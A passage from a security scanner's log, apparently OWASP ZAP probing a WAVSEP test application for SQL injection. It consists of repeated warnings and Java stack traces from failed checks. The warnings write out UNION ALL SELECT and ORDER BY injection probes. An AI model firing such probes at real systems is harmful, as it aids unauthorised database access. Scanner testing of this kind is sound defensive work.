org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682232 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682233 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682234 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682234 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682235 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682235 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682236 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682237 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682237 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682238 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682238 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 3118-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 3118-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682239 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown 